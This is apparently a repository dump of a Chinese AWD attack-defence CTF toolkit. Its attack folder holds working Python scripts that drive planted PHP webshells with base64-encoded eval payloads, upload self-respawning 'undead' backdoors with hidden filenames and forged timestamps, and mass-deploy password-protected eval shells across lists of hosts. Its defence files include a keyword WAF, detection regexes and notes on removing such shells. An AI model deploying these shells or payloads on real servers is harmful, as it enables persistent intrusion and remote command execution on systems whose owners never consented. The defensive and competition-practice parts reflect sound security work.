├── AWD-Script ├── Attack │ ├── GetFlag.py │ ├── ListCreate.php │ ├── upload_shell.py │ ├── 不死马.php │ ├── 命令生成不死马.txt │ ├── 命令生成不死马_批量版.py │ └── 隐藏不死马测试版.php ├── Defense │ ├── linux文件监控脚本.py │ ├── waf.php │ ├── 修改curl.txt │ ├── 克制不死马.txt │ ├── 日志地址.txt │ └── 检测外来IP.sh ├── Python │ ├── GetFlag.py │ ├── attack.py │ ├── ipfind.py │ ├── main.py │ ├── upload_shell.py │ ├── url.py │ ├── 处理B段.py │ ├── 提交flag.py │ ├── 根据URL生成字典.py │ └── 靶机ping扫描.py └── Readme.md ├── LICENSE └── README.md /AWD-Script/Attack/GetFlag.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | #coding=utf-8 3 | import sys,requests,base64 4 | 5 | def loadfile(filepath): 6 | try : 7 | file = open(filepath,"rb") 8 | return str(file.read()) 9 | except : 10 | print "File %s Not Found!" %filepath 11 | sys.exit() 12 | 13 | def file_write(filepath,filecontent): 14 | file = open(filepath,"a") 15 | file.write(filecontent) 16 | file.close() 17 | 18 | def getflag(url,method,passwd,flag_path): 19 | #flag机的url 20 | flag_url="192.168.45.1" 21 | #print url 22 | #判断shell是否存在 23 | try : 24 | res = requests.get(url,timeout=3) 25 | except : 26 | print "[-] %s ERR_CONNECTION_TIMED_OUT" %url 27 | file_write(flag_path,"[-] %s ERR_CONNECTION_TIMED_OUT\n\n" %url) 28 | return 0 29 | if res.status_code!=200 : 30 | print "[-] %s Page Not Found!" %url 31 | file_write(flag_path,"[-] %s Page Not Found!\n\n" %url) 32 | return 0 33 | #执行命令来获取flag system,exec,passthru,`,shell_exec 34 | #a=@eval(base64_decode($_GET[z0]));&z0=c3lzdGVtKCJ3aG9hbWkiKTs= 35 | cmd = "curl "+flag_url 36 | #cmd = "whoami" 37 | getflag_cmd ="echo system(\"%s\");"%cmd 38 | data={} 39 | if method=='get': 40 | data[passwd]='@eval(base64_decode($_GET[z0]));' 41 | data['z0']=base64.b64encode(getflag_cmd) 42 | try: 43 | res = requests.get(url,params=data,timeout=3) 44 | #print res.url 45 | if res.content: 46 | content = url+"\n"+res.content+"\n\n" 47 | file_write(flag_path,content) 48 | print "[+] %s getflag sucessed!"%url 49 | else : 50 | print "[-] %s cmd exec response is null!"%url 51 | content = url+"\ncmd exec response is null!\n\n" 52 | file_write(flag_path,content) 53 | except : 54 | file_write(flag_path,"\n[+] %s Getflag Failed! You can check the shell's passwd!\n\n"%url) 55 | print "[+] %s Getflag Failed! You can check the shell's passwd!"%url 56 | elif method=='post': 57 | data['pass']='Sn3rtf4ck' 58 | data[passwd]='@eval(base64_decode($_POST[z0]));' 59 | data['z0']=base64.b64encode(getflag_cmd) 60 | try: 61 | res = requests.post(url,data=data,timeout=3) 62 | if res.content: 63 | content = url+"\n"+res.content+"\n\n" 64 | file_write(flag_path,content) 65 | print "[+] %s getflag sucessed!"%url 66 | else : 67 | print "[-] %s cmd exec response is null!"%url 68 | content = url+"\ncmd exec response is null!\n\n" 69 | file_write(flag_path,content) 70 | except: 71 | file_write(flag_path,"\n[+] %s Getflag Failed! You can check the shell's passwd!\n\n"%url) 72 | print "[+] %s Getflag Failed! You can check the shell's passwd!"%url 73 | 74 | 75 | 76 | if __name__ == '__main__': 77 | #存放flag的文件 78 | flag_path="./flag.txt" 79 | shellstr=loadfile("./webshell.txt") 80 | list = shellstr.split("\r\n") 81 | #print str(list) 82 | i = 0 83 | url={} 84 | passwd={} 85 | method={} 86 | for data in list: 87 | if data: 88 | ls = data.split(",") 89 | method_tmp = str(ls[1]) 90 | method_tmp = method_tmp.lower() 91 | if method_tmp=='post' or method_tmp=='get': 92 | url[i]=str(ls[0]) 93 | method[i]=method_tmp 94 | passwd[i]=str(ls[2]) 95 | i+=1 96 | else : 97 | print "[-] %s request method error!" %(str(ls[0])) 98 | file_write(flag_path,"[-] %s request method error!\n\n" %(str(ls[0]))) 99 | else : pass 100 | #print str(len(url)) 101 | for j in range(len(url)): 102 | #调用执行命令的模块 103 | #print str(j) 104 | #print "url is %s method is %s passwd is %s" %(url[j],method[j],passwd[j]) 105 | getflag(url=url[j],method=method[j],passwd=passwd[j],flag_path=flag_path) 106 | print "Getflag finished!" 107 | -------------------------------------------------------------------------------- /AWD-Script/Attack/ListCreate.php: -------------------------------------------------------------------------------- 1 | "; 8 | } 9 | ?> 10 | -------------------------------------------------------------------------------- /AWD-Script/Attack/upload_shell.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | #coding=utf-8 3 | 4 | import sys,requests,base64 5 | 6 | ''' 7 | Usage: 8 | 将所需要传shell的url放在webshell.txt中,格式如下: 9 | url(含http:// or https://),method(请求方式),passwd 10 | http://127.0.0.1:80/1110/x.php,post,x 11 | http://127.0.0.2/1110/x.php,post,x 12 | http://127.0.0.3/1110/x.php,post,x 13 | 14 | tips: 别在","前后放空格。 15 | ''' 16 | #获取靶机的绝对路径 17 | def getpath(url,method,passwd): 18 | data = {} 19 | if method == "get": 20 | data[passwd] = '@eval(base64_decode($_GET[z0]));' 21 | data['z0'] = 'ZWNobyAkX1NFUlZFUlsnU0NSSVBUX0ZJTEVOQU1FJ107' 22 | res = requests.get(url,params=data) 23 | return res.content.strip() 24 | elif method == "post" : 25 | data[passwd] = '@eval(base64_decode($_POST[z0]));' 26 | data['z0'] = 'ZWNobyAkX1NFUlZFUlsnU0NSSVBUX0ZJTEVOQU1FJ107' 27 | res = requests.post(url,data=data) 28 | #print data 29 | return res.content.strip() 30 | else : 31 | return 0 32 | 33 | #加载要上传的后门内容 34 | def loadfile(filepath): 35 | try : 36 | file = open(filepath,"rb") 37 | return str(file.read()) 38 | except : 39 | print "File %s Not Found!" %filepath 40 | sys.exit() 41 | 42 | #写马函数 43 | def upload(url,method,passwd): 44 | #http://127.0.0.1:80/1110/x.php,post,x 45 | ''' 46 | 1.http or https 47 | 2.端口要放在ip变量中 48 | 3.Rfile /1110/x.php 49 | ''' 50 | try: 51 | url.index("http") 52 | #去除http:// ==> 127.0.0.1:80/1110/x.php 53 | urlstr=url[7:] 54 | lis = urlstr.split("/") 55 | ip=str(lis[0]) 56 | Rfile = "" 57 | for i in range(1,len(lis)): 58 | Rfile = Rfile+"/"+str(lis[i]) 59 | except : 60 | urlstr=url[8:] 61 | lis = urlstr.split("/") 62 | ip=str(lis[0]) 63 | Rfile = "" 64 | for i in range(1,len(lis)): 65 | Rfile = Rfile+"/"+str(lis[i]) 66 | #判断shell是否存在 67 | try : 68 | res = requests.get(url,timeout=10) 69 | except : 70 | print "[-] %s ERR_CONNECTION_TIMED_OUT" %url 71 | return 0 72 | if res.status_code!=200 : 73 | print "[-] %s Page Not Found!" %url 74 | return 0 75 | 76 | #加载要写入的内容 77 | shellPath = "./shell.php" 78 | shell_content = loadfile(shellPath) 79 | 80 | #获取靶机的绝对路径 81 | Rpath = getpath(url,method,passwd)#D:/phpStudy/WWW/1110/x.php 82 | list0 = Rpath.split("/") 83 | Rpath = "" 84 | for i in range(0,(len(list0)-1)): 85 | Rpath = Rpath+list0[i]+"/" 86 | data = {} 87 | #判断method 88 | if method =="post" : 89 | data[passwd] = "@eval(base64_decode($_POST['z0']));" 90 | data['z0'] = 'QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzsKJGY9YmFzZTY0X2RlY29kZSgkX1BPU1RbInoxIl0pOwokYz1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejIiXSk7CiRjPXN0cl9yZXBsYWNlKCJcciIsIiIsJGMpOwokYz1zdHJfcmVwbGFjZSgiXG4iLCIiLCRjKTsKJGJ1Zj0iIjsKZm9yKCRpPTA7JGk8c3RybGVuKCRjKTskaSs9MSkKICAgICRidWYuPXN1YnN0cigkYywkaSwxKTsKZWNobyhAZndyaXRlKGZvcGVuKCRmLCJ3IiksJGJ1ZikpOwplY2hvKCJ8PC0iKTsKZGllKCk7' 91 | data['z1'] = base64.b64encode(Rpath+"/fuck.php") 92 | data["z2"] = base64.b64encode(shell_content) 93 | #print data 94 | res = requests.post(url,data=data) 95 | elif method=="get" : 96 | data[passwd] = "@eval(base64_decode($_GET['z0']));" 97 | data['z0'] = 'QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzsKJGY9YmFzZTY0X2RlY29kZSgkX0dFVFsiejEiXSk7CiRjPWJhc2U2NF9kZWNvZGUoJF9HRVRbInoyIl0pOwokYz1zdHJfcmVwbGFjZSgiXHIiLCIiLCRjKTsKJGM9c3RyX3JlcGxhY2UoIlxuIiwiIiwkYyk7CiRidWY9IiI7CmZvcigkaT0wOyRpPHN0cmxlbigkYyk7JGkrPTEpCiAgICAkYnVmLj1zdWJzdHIoJGMsJGksMSk7CmVjaG8oQGZ3cml0ZShmb3BlbigkZiwidyIpLCRidWYpKTsKZWNobygifDwtIik7CmRpZSgpOw==' 98 | data['z1'] = base64.b64encode(Rpath+"/fuck.php") 99 | data["z2"] = base64.b64encode(shell_content) 100 | res = requests.post(url,params=data) 101 | else : 102 | print "method err!" 103 | sys.exit() 104 | 105 | #判断是否上传成功,失败直接跳过 106 | #print res.content 107 | if res.status_code!=200: 108 | print "[-] %s upload failed!" %ip 109 | return 0 110 | 111 | #激活不死马 112 | list=Rfile.split("/") 113 | b_url="http://"+ip 114 | max = len(list)-1 115 | for i in range(1,max): 116 | b_url=b_url+"/"+list[i] 117 | bsm_url = b_url+"/fuck.php" 118 | try : 119 | res = requests.get(bsm_url,timeout=3) 120 | except : 121 | pass 122 | #尝试访问不死马生成的shell 123 | shell_url = b_url+"/.index.php" 124 | res = requests.get(shell_url) 125 | if res.status_code!=200 : 126 | print "[-] %s create shell failed!" %bsm_url 127 | return 0 128 | #输出shell地址 129 | print "[+] %s upload sucessed!" %shell_url 130 | 131 | 132 | if __name__ == '__main__': 133 | shellstr=loadfile("./webshell.txt") 134 | list = shellstr.split("\r\n") 135 | #print str(list) 136 | i = 0 137 | url={} 138 | passwd={} 139 | method={} 140 | for data in list: 141 | if data: 142 | ls = data.split(",") 143 | method_tmp = str(ls[1]) 144 | method_tmp = method_tmp.lower() 145 | if method_tmp=='post' or method_tmp=='get': 146 | url[i]=str(ls[0]) 147 | method[i]=method_tmp 148 | passwd[i]=str(ls[2]) 149 | i+=1 150 | else : 151 | print "[-] %s request method error!" %(str(ls[0])) 152 | else : pass 153 | for j in range(len(url)): 154 | #print "url is %s method is %s passwd is %s" %(url[j],method[j],passwd[j]) 155 | upload(url=url[j],method=method[j],passwd=passwd[j]) 156 | -------------------------------------------------------------------------------- /AWD-Script/Attack/不死马.php: -------------------------------------------------------------------------------- 1 | '; 7 | //pass=Sn3rtf4ck 马儿用法:fuckyou.php?pass=Sn3rtf4ck&a=command 8 | while (1){ 9 | file_put_contents($file,$code); 10 | usleep(5000); 11 | } 12 | ?> 13 | -------------------------------------------------------------------------------- /AWD-Script/Attack/命令生成不死马.txt: -------------------------------------------------------------------------------- 1 | system('while true;do echo \'\' >fuck.php;sleep 0.1;done;'); 2 | 3 | 4 | ps -ax 可以查找到该进程 5 | -------------------------------------------------------------------------------- /AWD-Script/Attack/命令生成不死马_批量版.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | #coding=utf-8 3 | import sys,requests 4 | ''' 5 | 作用:向靶机发命令来写文件,文件名.index1.php 6 | webshell.txt 格式如下: 7 | http://127.0.0.1:80/1110/x.php,xost,x 8 | http://127.0.0.2/1110/xx.php,POST,x 9 | http://127.0.0.3/1011/x.php,get,3 10 | http://192.168.1.155/1110/x.php,post,x 11 | http://127.0.0.1/1110/y.php?pass=Sn3rtf4ck,get,a 12 | ''' 13 | 14 | def loadfile(filepath): 15 | try : 16 | file = open(filepath,"rb") 17 | return str(file.read()) 18 | except : 19 | print "File %s Not Found!" %filepath 20 | sys.exit() 21 | 22 | def cmd(url,method,passwd): 23 | #分割url ip 127.0.0.1:80 Rfile=/1111/x.php?pass=Sn3rtf4ck 24 | try: 25 | url.index("http") 26 | #去除http:// ==> 127.0.0.1:80/1110/x.php 27 | urlstr=url[7:] 28 | lis = urlstr.split("/") 29 | ip=str(lis[0]) 30 | Rfile = "" 31 | for i in range(1,len(lis)): 32 | Rfile = Rfile+"/"+str(lis[i]) 33 | except : 34 | urlstr=url[8:] 35 | lis = urlstr.split("/") 36 | ip=str(lis[0]) 37 | Rfile = "" 38 | for i in range(1,len(lis)): 39 | Rfile = Rfile+"/"+str(lis[i]) 40 | #判断shell是否存在 41 | try : 42 | res = requests.get(url,timeout=3) 43 | except : 44 | print "[-] %s ERR_CONNECTION_TIMED_OUT" %url 45 | return 0 46 | if res.status_code!=200 : 47 | print "[-] %s Page Not Found!" %url 48 | return 0 49 | #执行命令 system,exec,passthru,`,shell_exec 50 | #a=@eval(base64_decode($_GET[z0]));&z0=c3lzdGVtKCJ3aG9hbWkiKTs= 51 | data={} 52 | if method=='get': 53 | data[passwd]='@eval(base64_decode($_GET[z0]));' 54 | data['z0']='c3lzdGVtKCd3aGlsZSB0cnVlO2RvIGVjaG8gXCc8P3BocCBpZihtZDUoJF9QT1NUW3Bhc3NdKT09IjNhNTAwNjVlMTcwOWFjYzQ3YmEwYzkyMzgyOTQzNjRmIil7QGV2YWwoJF9QT1NUW2FdKTt9ID8+XCcgPi5pbmRleDEucGhwO3RvdWNoIC1tIC1kICIyMDE3LTExLTE3IDEwOjIxOjI2IiAuaW5kZXgxLnBocDtzbGVlcCA1O2RvbmU7Jyk7' 55 | try: 56 | res = requests.get(url,params=data,timeout=3) 57 | except : 58 | pass 59 | elif method=='post': 60 | data['pass']="Sn3rtf4ck" 61 | data[passwd]='@eval(base64_decode($_POST[z0]));' 62 | data['z0']='c3lzdGVtKCd3aGlsZSB0cnVlO2RvIGVjaG8gXCc8P3BocCBpZihtZDUoJF9QT1NUW3Bhc3NdKT09IjNhNTAwNjVlMTcwOWFjYzQ3YmEwYzkyMzgyOTQzNjRmIil7QGV2YWwoJF9QT1NUW2FdKTt9ID8+XCcgPi5pbmRleDEucGhwO3RvdWNoIC1tIC1kICIyMDE3LTExLTE3IDEwOjIxOjI2IiAuaW5kZXgxLnBocDtzbGVlcCA1O2RvbmU7Jyk7' 63 | try: 64 | res = requests.post(url,data=data,timeout=3) 65 | except: 66 | pass 67 | #print res.status_code 68 | ''' 69 | if res.status_code!=200 : 70 | print "[-] %s commad exec failed!" %url 71 | return 0 72 | ''' 73 | 74 | #检查shell是否存在。 75 | list=Rfile.split("/") 76 | b_url="http://"+ip 77 | max = len(list)-1 78 | for i in range(1,max): 79 | b_url=b_url+"/"+list[i] 80 | shell_url = b_url+"/.index1.php" 81 | res = requests.get(shell_url,timeout=3) 82 | if res.status_code!=200: 83 | print "[-] %s create shell failed!" %shell_url 84 | return 0 85 | else : 86 | print '[+] %s sucessed!' %shell_url 87 | 88 | 89 | if __name__ == '__main__': 90 | shellstr=loadfile("./webshell.txt") 91 | list = shellstr.split("\r\n") 92 | #print str(list) 93 | i = 0 94 | url={} 95 | passwd={} 96 | method={} 97 | for data in list: 98 | if data: 99 | ls = data.split(",") 100 | method_tmp = str(ls[1]) 101 | method_tmp = method_tmp.lower() 102 | if method_tmp=='post' or method_tmp=='get': 103 | url[i]=str(ls[0]) 104 | method[i]=method_tmp 105 | passwd[i]=str(ls[2]) 106 | i+=1 107 | else : 108 | print "[-] %s request method error!" %(str(ls[0])) 109 | else : pass 110 | #print str(len(url)) 111 | for j in range(len(url)): 112 | #调用执行命令的模块 113 | #print str(j) 114 | #print "url is %s method is %s passwd is %s" %(url[j],method[j],passwd[j]) 115 | cmd(url=url[j],method=method[j],passwd=passwd[j]) 116 | -------------------------------------------------------------------------------- /AWD-Script/Attack/隐藏不死马测试版.php: -------------------------------------------------------------------------------- 1 | '; 7 | //pass=Sn3rtf4ck 马儿用法:fuckyou.php?pass=Sn3rtf4ck&a=command 8 | while (1){ 9 | file_put_contents($file,$code); 10 | system('touch -m -d "2017-11-12 10:10:10" .index.php'); 11 | usleep(50000); 12 | } 13 | ?> 14 | -------------------------------------------------------------------------------- /AWD-Script/Defense/linux文件监控脚本.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | #coding=utf-8 3 | #Usage :python demo.py 4 | #Code by : AdminTony 5 | #QQ : 78941695 6 | #注意:要将此文件放在有读写权限的目录以及所有修改过的php必须在此目录或者该目录的子目录中。 7 | #作用:读取被修改过的文件,然后将文件的地址加上内容全部存放在txt 8 | 9 | 10 | 11 | import sys,subprocess,os 12 | #查找最近10分钟被修改的文件 13 | def scanfile(): 14 | #command: find -name '*.php' -mmin -10 15 | command = "find -name \'*.php\' -mmin -10" 16 | su = subprocess.Popen(command,shell=True,stdin=subprocess.PIPE,stdout=subprocess.PIPE,stderr=subprocess.PIPE) 17 | STDOUT,STDERR = su.communicate() 18 | list = STDOUT.split("\n") 19 | #print str(list) 20 | #将文件处理成list类型然后返回。 21 | return list 22 | 23 | #读取文件: 24 | def loadfile(addr): 25 | data = "" 26 | #如果文件不存在就跳出函数 27 | try : 28 | file = open(addr,'r') 29 | data = file.read() 30 | except : 31 | return 0 32 | all_data = addr+"\n"+data+"\n\n" 33 | file1 = open("shell.txt",'a+') 34 | #避免重复写入 35 | try: 36 | shell_content = file1.read() 37 | except: 38 | shell_content = "null" 39 | #如果文件内容不为空再写入,避免写入空的。 40 | #print shell_content 41 | if data : 42 | if all_data not in shell_content: 43 | file1.write(all_data) 44 | file.close() 45 | file1.close() 46 | rm_cmd = "rm -rf "+addr 47 | su = subprocess.Popen(rm_cmd,shell=True,stdin=subprocess.PIPE,stdout=subprocess.PIPE,stderr=subprocess.PIPE) 48 | su.communicate() 49 | print "loadfile over : "+addr 50 | 51 | if __name__ == '__main__': 52 | while True: 53 | 54 | list = scanfile() 55 | if list : 56 | for i in range(len(list)): 57 | #如果list[i]为空就不读取了 58 | if list[i]: 59 | loadfile(str(list[i])) 60 | else : pass 61 | -------------------------------------------------------------------------------- /AWD-Script/Defense/waf.php: -------------------------------------------------------------------------------- 1 | $value) { 8 | if (substr($name, 0, 5) == 'HTTP_') $headers[str_replace(' ', '-', ucwords(strtolower(str_replace('_', ' ', substr($name, 5))))) ] = $value; 9 | } 10 | return $headers; 11 | } 12 | } 13 | $get = $_GET; 14 | $post = $_POST; 15 | $cookie = $_COOKIE; 16 | $header = getallheaders(); 17 | $files = $_FILES; 18 | $ip = $_SERVER["REMOTE_ADDR"]; 19 | $method = $_SERVER['REQUEST_METHOD']; 20 | $filepath = $_SERVER["SCRIPT_NAME"]; 21 | //rewirte shell which uploaded by others, you can do more 22 | foreach ($_FILES as $key => $value) { 23 | $files[$key]['content'] = file_get_contents($_FILES[$key]['tmp_name']); 24 | file_put_contents($_FILES[$key]['tmp_name'], "virink"); 25 | } 26 | unset($header['Accept']); //fix a bug 27 | $input = array( 28 | "Get" => $get, 29 | "Post" => $post, 30 | "Cookie" => $cookie, 31 | "File" => $files, 32 | "Header" => $header 33 | ); 34 | //deal with 35 | $pattern = "select|insert|update|delete|and|or|\'|\/\*|\*|\.\.\/|\.\/|union|into|load_file|outfile|dumpfile|sub|hex"; 36 | $pattern.= "|file_put_contents|fwrite|curl|system|eval|assert"; 37 | $pattern.= "|passthru|exec|system|chroot|scandir|chgrp|chown|shell_exec|proc_open|proc_get_status|popen|ini_alter|ini_restore"; 38 | $pattern.= "|`|dl|openlog|syslog|readlink|symlink|popepassthru|stream_socket_server|assert|pcntl_exec"; 39 | $vpattern = explode("|", $pattern); 40 | $bool = false; 41 | foreach ($input as $k => $v) { 42 | foreach ($vpattern as $value) { 43 | foreach ($v as $kk => $vv) { 44 | if (preg_match("/$value/i", $vv)) { 45 | $bool = true; 46 | logging($input); 47 | break; 48 | } 49 | } 50 | if ($bool) break; 51 | } 52 | if ($bool) break; 53 | } 54 | } 55 | function logging($var) { 56 | date_default_timezone_set("Asia/Shanghai");//修正时间为中国准确时间 57 | $time=date("Y-m-d H:i:s");//将时间赋值给变量$time 58 | file_put_contents(LOG_FILENAME, "\r\n\r\n\r\n" . $time . "\r\n" . print_r($var, true) , FILE_APPEND); 59 | // die() or unset($_GET) or unset($_POST) or unset($_COOKIE); 60 | 61 | } 62 | waf(); 63 | ?> 64 | -------------------------------------------------------------------------------- /AWD-Script/Defense/修改curl.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ProbiusOfficial/AWD-Guide/b2abc57e5aab6c72edecf0d0ae970f7094686e37/AWD-Script/Defense/修改curl.txt -------------------------------------------------------------------------------- /AWD-Script/Defense/克制不死马.txt: -------------------------------------------------------------------------------- 1 | 1.ps -aux |grep shell.php 找到pid后杀掉进程就可以,你删掉脚本是起不了作用的,因为php执行的时候已经把脚本读进去解释成opcode运行了 2 | 3 | 2.重启php等web服务 4 | 5 | 3.用一个ignore_user_abort(true)脚本,一直竞争写入(断断续续)。usleep要低于对方不死马设置的值。 6 | 7 | 4.创建一个和不死马生成的马一样名字的文件夹。 8 | -------------------------------------------------------------------------------- /AWD-Script/Defense/日志地址.txt: -------------------------------------------------------------------------------- 1 | /var/log/apache2/ 2 | /usr/local/apache2/logs -------------------------------------------------------------------------------- /AWD-Script/Defense/检测外来IP.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | #写自己队的ip 3 | ipA="172.22.60.230" 4 | ipB="172.22.60.231" 5 | ipC="172.22.60.232" 6 | while [ "1" = "1"] 7 | do 8 | hackip=`netstat -an | grep "ESTA" | awk '{print $5}' | cut -d ":" -f1` 9 | if [[ $ipA =~ $hackip -a $ipB =~ $hackip -a $ipC =~ $hackip ]] 10 | then 11 | echo `date` "安全!!!" > iplog.txt 12 | else 13 | #gnome-terminal -t "Warning! Warning!" -x bash -c "echo 有不明IP闯入!----'$hackip';exec bash;" 14 | echo `date` $hackip >> hackiplog.txt 15 | fi 16 | sleep 30 17 | done 18 | #iptables -A INPUT -s $hackip -j REJECT //屏蔽某个ip 19 | #iptables -L //查看防火墙策略 20 | #iptables -F //关闭防火墙策略 -------------------------------------------------------------------------------- /AWD-Script/Python/GetFlag.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | #coding=utf-8 3 | import sys,requests,base64 4 | 5 | def loadfile(filepath): 6 | try : 7 | file = open(filepath,"rb") 8 | return str(file.read()) 9 | except : 10 | print "File %s Not Found!" %filepath 11 | sys.exit() 12 | 13 | def file_write(filepath,filecontent): 14 | file = open(filepath,"a") 15 | file.write(filecontent) 16 | file.close() 17 | 18 | def getflag(url,method,passwd,flag_path): 19 | #flag机的url 20 | flag_url="192.168.45.1" 21 | #print url 22 | #判断shell是否存在 23 | try : 24 | res = requests.get(url,timeout=3) 25 | except : 26 | print "[-] %s ERR_CONNECTION_TIMED_OUT" %url 27 | file_write(flag_path,"[-] %s ERR_CONNECTION_TIMED_OUT\n\n" %url) 28 | return 0 29 | if res.status_code!=200 : 30 | print "[-] %s Page Not Found!" %url 31 | file_write(flag_path,"[-] %s Page Not Found!\n\n" %url) 32 | return 0 33 | #执行命令来获取flag system,exec,passthru,`,shell_exec 34 | #a=@eval(base64_decode($_GET[z0]));&z0=c3lzdGVtKCJ3aG9hbWkiKTs= 35 | cmd = "curl "+flag_url 36 | #cmd = "whoami" 37 | getflag_cmd ="echo system(\"%s\");"%cmd 38 | data={} 39 | if method=='get': 40 | data[passwd]='@eval(base64_decode($_GET[z0]));' 41 | data['z0']=base64.b64encode(getflag_cmd) 42 | try: 43 | res = requests.get(url,params=data,timeout=3) 44 | #print res.url 45 | if res.content: 46 | content = url+"\n"+res.content+"\n\n" 47 | file_write(flag_path,content) 48 | print "[+] %s getflag sucessed!"%url 49 | else : 50 | print "[-] %s cmd exec response is null!"%url 51 | content = url+"\ncmd exec response is null!\n\n" 52 | file_write(flag_path,content) 53 | except : 54 | file_write(flag_path,"\n[+] %s Getflag Failed! You can check the shell's passwd!\n\n"%url) 55 | print "[+] %s Getflag Failed! You can check the shell's passwd!"%url 56 | elif method=='post': 57 | data['pass']='Sn3rtf4ck' 58 | data[passwd]='@eval(base64_decode($_POST[z0]));' 59 | data['z0']=base64.b64encode(getflag_cmd) 60 | try: 61 | res = requests.post(url,data=data,timeout=3) 62 | if res.content: 63 | content = url+"\n"+res.content+"\n\n" 64 | file_write(flag_path,content) 65 | print "[+] %s getflag sucessed!"%url 66 | else : 67 | print "[-] %s cmd exec response is null!"%url 68 | content = url+"\ncmd exec response is null!\n\n" 69 | file_write(flag_path,content) 70 | except: 71 | file_write(flag_path,"\n[+] %s Getflag Failed! You can check the shell's passwd!\n\n"%url) 72 | print "[+] %s Getflag Failed! You can check the shell's passwd!"%url 73 | 74 | 75 | 76 | if __name__ == '__main__': 77 | #存放flag的文件 78 | flag_path="./flag.txt" 79 | shellstr=loadfile("./webshell.txt") 80 | list = shellstr.split("\r\n") 81 | #print str(list) 82 | i = 0 83 | url={} 84 | passwd={} 85 | method={} 86 | for data in list: 87 | if data: 88 | ls = data.split(",") 89 | method_tmp = str(ls[1]) 90 | method_tmp = method_tmp.lower() 91 | if method_tmp=='post' or method_tmp=='get': 92 | url[i]=str(ls[0]) 93 | method[i]=method_tmp 94 | passwd[i]=str(ls[2]) 95 | i+=1 96 | else : 97 | print "[-] %s request method error!" %(str(ls[0])) 98 | file_write(flag_path,"[-] %s request method error!\n\n" %(str(ls[0]))) 99 | else : pass 100 | #print str(len(url)) 101 | for j in range(len(url)): 102 | #调用执行命令的模块 103 | #print str(j) 104 | #print "url is %s method is %s passwd is %s" %(url[j],method[j],passwd[j]) 105 | getflag(url=url[j],method=method[j],passwd=passwd[j],flag_path=flag_path) 106 | print "Getflag finished!" 107 | -------------------------------------------------------------------------------- /AWD-Script/Python/attack.py: -------------------------------------------------------------------------------- 1 | import os 2 | import sys 3 | import url 4 | 5 | 6 | sqllist,xsslist,senlist = [],[],[] 7 | 8 | otherurl,xssip,sqlip,senip = [],[],[],[] 9 | 10 | feifa = [] 11 | def find_attack(needlist): 12 | 13 | print('>>>>>>>开始检测攻击') 14 | 15 | sql = r'product.php|preg_\w+|execute|echo|print|print_r|var_dump|(fp)open|^eval$|file_get_contents|include|require|require_once|shell_exec|phpinfo|system|passthru|\(?:define|base64_decode\(|group\s+by.+\(|%20or%20|%20and%20|sleep|delay|nvarchar|exec|union|^select$|version|insert|information_schema|chr\(|concat|%bf|sleep\((\s*)(\d*)(\s*)\)|current|having|database' 16 | 17 | xss = r'alert|^script$|<|>|%3E|%3c|>|\u003c|\u003e|&#x' 18 | 19 | sen = r'\.{2,}|%2e{2,}|%252e{2,}|%uff0e{2,}0x2e{2,}|\./|\{FILE\}|%00+|json|\.shtml|\.pl|\.sh|\.do|\.action|zabbix|phpinfo|/var/|/opt/|/local/|/etc|/apache/|\.log|invest\b|\.xml|apple-touch-icon-152x152|\.zip|\.rar|\.asp\b|\.php|\.bak|\.tar\.gz|\bphpmyadmin\b|admin|\.exe|\.7z|\.zip|\battachments\b|\bupimg\b|uploadfiles|templets|template|data\b|forumdata|includes|cache|jmxinvokerservlet|vhost|bbs|host|wwwroot|\bsite\b|root|hytop|flashfxp|bak|old|mdb|sql|backup|^java$|class' 20 | 21 | 22 | 23 | for i in needlist: 24 | 25 | if i[2] == 'POST' or i[2] == 'HEAD' or i[2] == 'GET': 26 | 27 | response = re.findall(sql,i[3],re.I) 28 | 29 | if response == []: 30 | 31 | responsexss = re.findall(xss,i[3],re.I) 32 | 33 | if responsexss == []: 34 | 35 | responsesen = re.findall(sen,i[3],re.I) 36 | 37 | if responsesen == []: 38 | 39 | otherurl.append(i) 40 | 41 | else: 42 | 43 | senlist.append(i) 44 | 45 | senip.append(i[0]) 46 | 47 | print(responsesen) 48 | 49 | print('检测出敏感目录扫描') 50 | 51 | print(i) 52 | 53 | else: 54 | 55 | xsslist.append(i) 56 | 57 | xssip.append(i[0]) 58 | 59 | print(responsexss) 60 | 61 | print('检测出xss攻击') 62 | 63 | print(i) 64 | 65 | else: 66 | 67 | sqllist.append(i) 68 | 69 | sqlip.append(i[0]) 70 | 71 | print(responsexss) 72 | 73 | print('检测出sql攻击') 74 | 75 | print(i) 76 | 77 | else: 78 | 79 | feifa.append(i[0]) 80 | 81 | print('非法请求:'+str(len(feifa))+'次'+str(len(list(set(feifa))))+'个ip') 82 | 83 | print('>>>>>>>攻击检测完毕') 84 | 85 | return [xssip,sqlip,senip,sqllist,xsslist,senlist,otherurl] -------------------------------------------------------------------------------- /AWD-Script/Python/ipfind.py: -------------------------------------------------------------------------------- 1 | import re 2 | import urllib.request 3 | 4 | def url_open(ip): 5 | 6 | url = 'http://www.ip138.com/ips138.asp?ip='+ip 7 | 8 | response = urllib.request.urlopen(url) 9 | 10 | html = response.read().decode('gb2312') 11 | 12 | return html 13 | 14 | 15 | def find_ip(html): 16 | 17 | a = r'本站数据.{20,}' 18 | 19 | p = re.compile(a,re.I) 20 | 21 | response = re.findall(p,html) 22 | 23 | for i in response: 24 | 25 | b = i 26 | 27 | response = re.split(r'
